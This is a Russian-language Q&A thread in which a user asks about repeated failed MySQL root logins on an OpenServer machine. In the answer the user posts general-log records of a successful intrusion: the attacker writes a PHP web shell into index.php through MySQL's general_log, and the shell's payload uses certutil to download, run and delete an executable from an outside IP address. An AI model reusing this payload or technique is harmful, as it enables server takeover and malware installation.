# Почему на сервере приходят такие логи?

Tags: openserver

Почему на сервер приходят такие логи? И такие запросы идут постоянно с не известных мне IP адресов.

```
 2019-04-15T01:46:55.969692Z 83 [Warning] IP address '113.4.133.2' could not be resolved: Этот хост неизвестен. 
2019-04-15T01:46:56.226591Z 83 [Note] Access denied for user 'root'@'113.4.133.2' (using password: NO)
2019-04-15T01:46:57.015772Z 84 [Note] Access denied for user 'root'@'113.4.133.2' (using password: YES)
2019-04-15T02:30:04.851109Z 85 [Note] Access denied for user 'notused'@'85.93.20.38' (using password: YES)
2019-04-15T04:08:31.705370Z 87 [Note] Access denied for user 'noticias'@'85.93.20.38' (using password: YES)
2019-04-15T05:44:35.619204Z 88 [Note] Access denied for user 'toor'@'85.93.20.38' (using password: YES)
2019-04-15T07:17:36.551969Z 90 [Note] Access denied for user 'travis'@'85.93.20.38' (using password: YES)
2019-04-15T08:39:43.167608Z 97 [Warning] IP address '59.53.31.183' could not be resolved: Этот хост неизвестен. 
2019-04-15T08:39:43.397245Z 97 [Note] Access denied for user 'root'@'59.53.31.183' (using password: NO)
2019-04-15T08:43:58.798520Z 100 [Note] Access denied for user 'wheels'@'85.93.20.38' (using password: YES)
2019-04-15T08:44:14.483393Z 101 [Note] Access denied for user 'root'@'59.53.31.183' (using password: NO)
```

Comment: А почему бы нет?

Comment: Миллионы китайцев круглосуточно пытаются взломать КАЖДЫЙ существующий сервер в интернете. Китай следует заблокировать в фаерволе

Comment: @andreymal, ну и пусть пытаются - не жалко)

Comment: @Qwertiy По тому как все еще в разработке. И полного использования еще нет. Ну и как бы я химией там занимаюсь а вот от куда все это?

Comment: @Qwertiy половину занятого логами места у меня занимают именно китайцы, лучше уж заблокировать, а то в архиве логов место зазря жрут)

Comment: @ВасилийПетров, у меня развёрнутый на домашнем компе на нестандаартном порту сайт кто-то пытался использовать как прокси. Не вышло, потому что там была всего 1 страница и она отправлялась в ответ на любой запрос)))

Comment: @Qwertiy Тогда понятно))))

Comment: @ВасилийПетров, [вот](//ru.stackoverflow.com/q/659533/178988), только реальный порт там был не восьмёрки, а пооригинальнее.

Comment: Я так понимаю это логи mysql ... Рекомендую mysql вообще наружу не выставлять. Если доступ с каких то внешних машин на него все таки нужен, то явно задавать разрешения в фаерволе конкретно для них

Comment: Кто то мне как то криво залил шел или бэкдор

Answer (score 0):

Все гораздо хуже чем я думал

```
C:phpStudyPHPTutorialWWWindex.php
C:phpStudyWWWindex.php
C:PHPTutorialWWWindex.php
C:xampphtdocsindex.php
D:phpStudyPHPTutorialWWWindex.php
D:phpStudyWWWindex.php
D:PHPTutorialWWWindex.php
E:phpStudyPHPTutorialWWWindex.php
E:phpStudyWWWindex.php
E:PHPTutorialWWWindex.php
```

В папке mysql появились такие файлы со следующим содержимым

```
e:\ospanel\modules\database\MySQL-5.6\bin\mysqld.exe, Version: 5.6.38 (MySQL 

Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
181221 14:59:22    11 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
181221 14:59:23    11 Query set global general_log='on'
           11 Query SET global general_log_file='C:\PHPTutorial\WWW\index.php'
e:\ospanel\modules\database\MySQL-5.6\bin\mysqld.exe, Version: 5.6.38 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
190125  8:31:00   446 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
          446 Query set global general_log='on'
          446 Query SET global general_log_file='C:\PHPTutorial\WWW\index.php'
e:\ospanel\modules\database\MySQL-5.6\bin\mysqld.exe, Version: 5.6.38-log (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
190403  7:52:23 18298 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
        18298 Query set global general_log='on'
        18298 Query SET global general_log_file='C:\PHPTutorial\WWW\index.php'
e:\ospanel\modules\database\MySQL-5.6\bin\mysqld.exe, Version: 5.6.38-log (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
190406 16:19:40   434 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
          434 Query set global general_log='on'
190406 16:19:41   434 Query SET global general_log_file='C:\PHPTutorial\WWW\index.php'
```

Comment: Значит, видимо, пароль у вас был слабый, и китайцы его всё-таки подобрали

Comment: @andreymal Походу